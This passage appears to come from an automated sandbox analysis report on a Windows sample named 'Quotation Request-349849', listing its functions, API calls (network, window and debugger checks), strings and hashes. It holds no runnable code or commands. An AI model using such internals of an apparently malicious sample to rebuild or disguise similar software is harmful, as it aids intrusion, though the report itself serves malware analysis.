                                                      APIs
                                                        • Part of subcall function 007D4F0B: __fread_nolock.LIBCMT ref: 007D4F29
                                                      • _wcscmp.LIBCMT ref: 00839824
                                                      • _wcscmp.LIBCMT ref: 00839837
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$__fread_nolock
                                                      • String ID: FILE
                                                      • API String ID: 4029003684-3121273764
                                                      • Opcode ID: 3cd66fa7bf002ee591cc3be85cf5d0387e7e9cf7f0be338451d08fdb6aa5e494
                                                      • Instruction ID: 8ca0b1108f423126b3e5c250d53e5208145066b812f84c2abb393023c81e6579
                                                      • Opcode Fuzzy Hash: 3cd66fa7bf002ee591cc3be85cf5d0387e7e9cf7f0be338451d08fdb6aa5e494
                                                      • Instruction Fuzzy Hash: 0A418671A04219BBDF219BA4CC49FEFB7B9EF85710F00047AF904F7291DA7599058BA1
                                                      Function 0084258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0084259E
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008425D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_memset
                                                      • String ID: |
                                                      • API String ID: 1413715105-2343686810
                                                      • Opcode ID: 1bbc67a23c29666c2f5f459974f866dfc4a648fcba980086f07d91274611f6ae
                                                      • Instruction ID: 96d5c9431a16f8c05db799c95e9b410783c2c4392fc7e8b7354d9ce323ae62c3
                                                      • Opcode Fuzzy Hash: 1bbc67a23c29666c2f5f459974f866dfc4a648fcba980086f07d91274611f6ae
                                                      • Instruction Fuzzy Hash: 3B31157180511DEBCF05EFA4CC89EEEBFB8FF18354F10006AF914A6262EA355956DB60
                                                      Function 00857A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00857B61
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00857B76
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: 0e1277f00e71e6ffc21100c38814521d07e7dff6734c21a7c568ba9e7b291b79
                                                      • Instruction ID: eac4138e43a2963b0c96382833e96a17611c573d0bb08656496af743e1e38e11
                                                      • Opcode Fuzzy Hash: 0e1277f00e71e6ffc21100c38814521d07e7dff6734c21a7c568ba9e7b291b79
                                                      • Instruction Fuzzy Hash: 6C412874A0430A9FDB14CF64D880BEABBB5FB08311F14416AED04EB381D730AA45CF90
                                                      Function 00856A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00856B17
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00856B53
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: e7f7e91d7ca0f9b338c461679154225725cfa98d3407e1f8a42861947f2b19a7
                                                      • Instruction ID: 4d612ce506f82bbe3e5a08e64f4dbd444dc981f16b58647fad924c679867389d
                                                      • Opcode Fuzzy Hash: e7f7e91d7ca0f9b338c461679154225725cfa98d3407e1f8a42861947f2b19a7
                                                      • Instruction Fuzzy Hash: DB319E71200604AEDB119F68CC80BFB77B9FF48761F50861AFDA5D7190EA34AC95CB60
                                                      Function 008328A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00832911
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0083294C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 9ab0c744507c5c337c6b57ea39f47c848333f0e2fbbf5e9e9d57f5ff315933d1
                                                      • Instruction ID: 8aa27fa84de744f5495f5fcbef574364d234282d6065a183e79192929c28633e
                                                      • Opcode Fuzzy Hash: 9ab0c744507c5c337c6b57ea39f47c848333f0e2fbbf5e9e9d57f5ff315933d1
                                                      • Instruction Fuzzy Hash: 2231BF31A00309EBEB25DE58C885FAEBFA8FF85350F180069ED85E62A1D7709944CB91
                                                      Function 008439E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __snwprintf.LIBCMT ref: 00843A66
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __snwprintf_memmove
                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                      • API String ID: 3506404897-2584243854
                                                      • Opcode ID: 239e0575c641926ccc7788cd6c8579cdd3d6f465d909556be14708254ec4f8eb
                                                      • Instruction ID: 8720b89d24187c8e6de7e2442d1cb77f7f2fea0ed64b0247576de452fbd95db0
                                                      • Opcode Fuzzy Hash: 239e0575c641926ccc7788cd6c8579cdd3d6f465d909556be14708254ec4f8eb
                                                      • Instruction Fuzzy Hash: 63217C3164022DEFCF14EF64CC86AAE77B9FB44700F500455E559EB282EB38AA45CB61
                                                      Function 008566D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00856761
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0085676C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: c6a25a60974c0cd44681a14dbba7a036484732f9412f692a8bef366103e8c861
                                                      • Instruction ID: fb856013e969510791fd405db34b8af9029c1711724e6039a3d31648df1013b4
                                                      • Opcode Fuzzy Hash: c6a25a60974c0cd44681a14dbba7a036484732f9412f692a8bef366103e8c861
                                                      • Instruction Fuzzy Hash: 6C118275300208BFEF259F54CC81EBB37AAFB983A9F504229FD14D7290E6759C6587A0
                                                      Function 00856C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007D1D73
                                                        • Part of subcall function 007D1D35: GetStockObject.GDI32(00000011), ref: 007D1D87
                                                        • Part of subcall function 007D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D1D91
                                                      • GetWindowRect.USER32(00000000,?), ref: 00856C71
                                                      • GetSysColor.USER32(00000012), ref: 00856C8B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: d8246dbb91bbbbdee0154f1c73741d3a7ef7ad8971827d8b1af803223a16e660
                                                      • Instruction ID: e5ab29dfea66fc5764dbdcae7668326794e3639706b4256e7652032305bfcc4e
                                                      • Opcode Fuzzy Hash: d8246dbb91bbbbdee0154f1c73741d3a7ef7ad8971827d8b1af803223a16e660
                                                      • Instruction Fuzzy Hash: 28211472610209AFDF04DFA8CC45AEA7BA9FB08315F404629FE95D3251E635E864DB60
                                                      Function 00856920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 008569A2
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008569B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: 4e0d3818f22ac51d4136c11feaaaa261d299aa9b2663ce7bc6970b83fe3a72bf
                                                      • Instruction ID: 2790c4996e525586f625c24aa3c85dde23d1c50c3f8952c577ddf374869b01fa
                                                      • Opcode Fuzzy Hash: 4e0d3818f22ac51d4136c11feaaaa261d299aa9b2663ce7bc6970b83fe3a72bf
                                                      • Instruction Fuzzy Hash: FC116D71100209ABEB108E74DC44AEB3BA9FB1537AF904724FEA5D71E0E735DC699760
                                                      Function 008329AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00832A22
                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00832A41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 70f728bdff3df21c089a970d89d9c9901bb9211ab463cc0451e006e2137056b1
                                                      • Instruction ID: f24c4279e3a06065c27be168fabffd455def560a5d08816ab53ff0d3420152b4
                                                      • Opcode Fuzzy Hash: 70f728bdff3df21c089a970d89d9c9901bb9211ab463cc0451e006e2137056b1
                                                      • Instruction Fuzzy Hash: D3119332901138ABDB35EA9CDC44BAA77A9FB85314F244121E995E72A0D770AD0AC7D1
                                                      Function 008421D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0084222C
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00842255
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: aac7d949b73435f3cf808076e5e824a5ecce69b98d18d734cc29032f79afdd3d
                                                      • Instruction ID: 0057c83fd8b3bf3e335caf6eb58b399a84ff465c6e31d0e9e082dfc9440c9ea5
                                                      • Opcode Fuzzy Hash: aac7d949b73435f3cf808076e5e824a5ecce69b98d18d734cc29032f79afdd3d
                                                      • Instruction Fuzzy Hash: C211A070549239BADB258F518C84EBBFBA8FF1A755F50822AFA15D6100D2B06990D6F0
                                                      Function 00828E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 0082AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0082AABC
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00828E73
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: e695d50ce088988519a4a91dad7851c39daa4b8426fe8c1273c0998221824d1e
                                                      • Instruction ID: 7267e71ca6e2c454668fc94f67ebaaf78fe885a34d6e5f65c0198370e0273392
                                                      • Opcode Fuzzy Hash: e695d50ce088988519a4a91dad7851c39daa4b8426fe8c1273c0998221824d1e
                                                      • Instruction Fuzzy Hash: 9D019275602229EB8F18ABA4DC558FE7379FF05320B54061AB872A73E2EE355848C750
                                                      Function 00838D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_memmove
                                                      • String ID: EA06
                                                      • API String ID: 1988441806-3962188686
                                                      • Opcode ID: 1e85de99b7ea8231b2449da8701c6a4a4717ab6e229518fb8ecfa44fbc56691c
                                                      • Instruction ID: 8bd3186716ef2870dcb57ce3e837453c647688825d3aac942657fc9265d33bcd
                                                      • Opcode Fuzzy Hash: 1e85de99b7ea8231b2449da8701c6a4a4717ab6e229518fb8ecfa44fbc56691c
                                                      • Instruction Fuzzy Hash: 1801F97180421CBEDB18DAA8CC1AEFE7BF8DB11301F00419AF652D2281E878E60487A0
                                                      Function 00828CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 0082AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0082AABC
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00828D6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: e601587803e6fcd1391ea2ecdbbb38ceef55f6bf0f943ddc104aea6398050f2e
                                                      • Instruction ID: a083956112956f1c4dd8968740dbeecde7c1cf0ed4e7e703c8df4b0b7a2f59fc
                                                      • Opcode Fuzzy Hash: e601587803e6fcd1391ea2ecdbbb38ceef55f6bf0f943ddc104aea6398050f2e
                                                      • Instruction Fuzzy Hash: 9501B171A41119EBDF18EBA4D956AFE73B8EF15300F10002AB802A3291EE285A0CD661
                                                      Function 00828D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 0082AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0082AABC
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00828DEE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 372448540-1403004172
                                                      • Opcode ID: 7a22655fc4519e1c0c16d52c17657b7267e23f01b61b8f96a6fd76535f6b3e7f
                                                      • Instruction ID: 3a3daac5da530f8662e7da1cf2284863dbc628e98598f01e953a4e95b45bbe28
                                                      • Opcode Fuzzy Hash: 7a22655fc4519e1c0c16d52c17657b7267e23f01b61b8f96a6fd76535f6b3e7f
                                                      • Instruction Fuzzy Hash: 74018471A41119E7DF15E6A4D956AFE77A8EF11300F100016B846B32D2DA295E4CD271
                                                      Function 00834F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp
                                                      • String ID: #32770
                                                      • API String ID: 2292705959-463685578
                                                      • Opcode ID: 7045b53dbad18cdaf8aff70fa765858bdb50ee62bd6fef25d31e71eda224ff5d
                                                      • Instruction ID: 3fba934fbfaa2ef16298a9f821594a396d794b0f9331db53323173c6f93fd94e
                                                      • Opcode Fuzzy Hash: 7045b53dbad18cdaf8aff70fa765858bdb50ee62bd6fef25d31e71eda224ff5d
                                                      • Instruction Fuzzy Hash: B7E0D13260432C67D710A795DC49FA7F7ACFB85B71F010067FD04D3151D9649A5587D0
                                                      Function 0080B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0080B314: _memset.LIBCMT ref: 0080B321
                                                        • Part of subcall function 007F0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0080B2F0,?,?,?,007D100A), ref: 007F0945
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,007D100A), ref: 0080B2F4
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,007D100A), ref: 0080B303
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0080B2FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
